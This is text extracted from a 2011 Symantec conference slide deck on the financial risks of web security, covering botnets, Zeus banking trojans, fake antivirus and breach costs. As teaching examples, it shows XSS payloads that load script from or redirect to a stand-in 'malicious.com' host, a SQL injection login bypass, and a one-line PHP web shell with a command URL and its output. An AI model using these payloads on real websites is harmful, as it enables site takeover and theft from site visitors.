2024: Domino Containers - The Next Step. News from the Domino Container commu...
Financial Risks to Internet Security
1. Costs and Financial Risks of Web Security
Martin Lee CISSP CEng
Dr. Les Pritchard CITP
SR B03 - Costs and Financial Risks of Web Security 1
2. Where the Threats Come From.
Insider threats Mostly accidental data deletion.
Acts of God Fire, flood, volcanos!
Malicious outsiders Malware, banking trojans.
(cybercriminals)
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 2
3. How the Bad Guys Make Money
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 3
4. Anyone’s Computer or Your Computer?
Compromising any computer.
Botnets Denial of service attacks.
Send spam.
Steal data.
Compromising any computer.
Banking trojans
Internet bank robbery.
Compromising specific systems.
Targeted attacks
Stealing high value data.
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 4
5. Making Money From Botnets – Sending Spam
Traffic analysis of rogue website
26 days, 350 million spams, 28 sales
But, when scaled up
~$7000 in sales per day
~$2M per year
Source :
C. Kanich et al. “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”. Nov 2008
(http://www.icsi.berkeley.edu/pubs/networking/2008-ccs-spamalytics.pdf)
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 5
6. Making Money From Botnets – Denial of Service
Can hit 100Gb/sec attack traffic.
Estimated UK losses $3bn/yr.
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 6
7. Making Money From Banking Trojans
Source : http://www.wired.com/threatlevel/2010/10/zeus-ukraine-arrests/
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 7
8. Banking Trojans – Zeus Man-in-Browser Attack
Malware waits for log in to internet banking,
issues payments on your behalf to money mules.
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 8
9. Banking Trojans – Zeus Man-in-Browser Attack
Malware intercepts data sent from bank,
removes it’s transfers, adjusts balance,
shows you what you expect to see.
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 9
10. Distributing Web Malware
Gumblar Lifecycle
CONTROLS FORWARDS
Uploading web malware to your website
XSS MALWARE
by stealing your login details. HACKER EXPLOIT HOST
ADDS
XSS
EXPLOIT VISITS
STEALS
LOGIN
INSTALLS
UNAFECTED MALWARE
WEBSITE
VICTIM
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 10
11. Malware on Legitimate Domains
Malicious domains lifecycle: % remaining active over time
100%
Over time more than 80% of
malicious domains
are “Old” domains
80%
“Old” domains
60%
80%
40%
“New” Domains
20%
0%
0 30 60 90 120 150 180
Days
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 11
13. Browsing Habits Outside of the Office
100
% of web blocks
80
60
Mobile
40 Office
20
0
20 40 60 80 100
% of users
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 13
14. Distributing Web Malware – Advertising Services
Subvert a legitimate website
WEB PAGE
Sold by sales team advertiser
Sold by reseller advertiser
Malware
resold further distributor
Adverts
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011
15. Fake AV
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011
16. Fake AV
Do the maths –
1 million products sold
@$39.95
$8.2 million fine
= $31.75 million profit!
Source: http://www.pcworld.com/businesscenter/article/217987/alleged_scareware_vendors_to_pay_82_million_to_ftc.html
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011
18. My Website – XSS Example
www.example.com/index.php?page=cat&category=1&PHPSESSID=
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 18
19. My Website – XSS Example
Attack JS –
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
URL encode it, replace ‘category’ value
www.example.com/index.php?page=cat&category=1&PHPSESSID=
becomes
www.example.com/index.php?page=cat&category=%3E%0A%3C%53%43%52%49
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 19
20. My Website – XSS Example
Attacker can execute whatever they like:
Exploit – <script src=“http://www.malicious.com/attack.js”>
Redirect – window.location.href = “http://www.malicious.com/“
Why not? – document.product.price = “0.01”
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 20
21. XSS Example – Click that link
Email containing link
WEB PAGE
Embed link in discussion page
ENTER TEXT SUBMIT
I agree. <img src=“/images/smiley.gif”
onload=“document.location=‘http://malicious/’”>
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 21
22. SQL Injection – “Little Bobby Tables”
Source: XKCD Comic - http://xkcd.com/327/
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 22
23. My Website – SQL Injection Example
SQL injection:
Select * from users where username = “$input” and password=md5($password);
$input = ‘ admin”; -- ‘
Select * from users where username = “admin”; -- ... ignored
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 23
24. My Website – SQL Injection Example
How about a file like this?
<? system($_REQUEST*‘cmd’+); ?>
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 24
25. My Website – Now completely at mercy of attacker
http://www.example.com/images/shell.php?cmd=%6C%73%20%2D%6C
ls -l -> %6C%73%20%2D%6C
total 36
-rw-rw-r-- 1 martin martin 191 Nov 27 2003 categories.php
drwxrwxr-x 2 martin martin 4096 Mar 16 17:53 inc
-rw-rw-r-- 1 martin martin 543 Mar 29 14:54 index.old
-rw-r--r-- 1 martin martin 124 Mar 29 15:03 index.php
-rw-rw-r-- 1 martin martin 537 Mar 29 14:41 index.php~
-rw-rw-r-- 1 martin martin 2068 Mar 29 16:20
product_image.php
-rw-rw-r-- 1 martin martin 1924 Nov 28 2003
product_image.php~
-rw-rw-r-- 1 martin martin 189 Nov 27 2003 products.php
-rw-r--r-- 1 martin martin 31 Mar 29 15:04 shell.php
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 25
26. Vulnerable Websites
Skilled attackers can easily find vulnerabilities.
Others can use a list of vulnerable websites.
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 26
27. How You Lose Money
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 27
28. Data Breach Losses
• Ponemon Institute & Symantec Research
– Average cost per data breach $7.2 million.
– $214 per breached record.
– 31% of breaches are malicious or criminal attack.
– Malicious attacks cost more $318 per breached record.
See: http://www.symantec.com/about/news/release/article.jsp?prid=20110308_01
Calculate your risk: http://databreachcalculator.com/
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 28
29. Symantec SMB Survey – What do SMBs suffer?
60%
Environment downtime
50%
Corporate data theft
40%
Customer or employee
30% PI theft
Customer financial
20% information theft
Intellectual property
10% theft
0%
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 29
31. Know Your Assets, Know Attack Vectors
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 31
32. Layers of Protection Provide Maximum Detection
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 32
33. Test & Monitor Your Web Services
Find & fix vulnerabilities in
your web services.
Monitor logs to identify attacks,
block attacker.
You don’t need to be perfect,
just better than your
competitors.
SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 33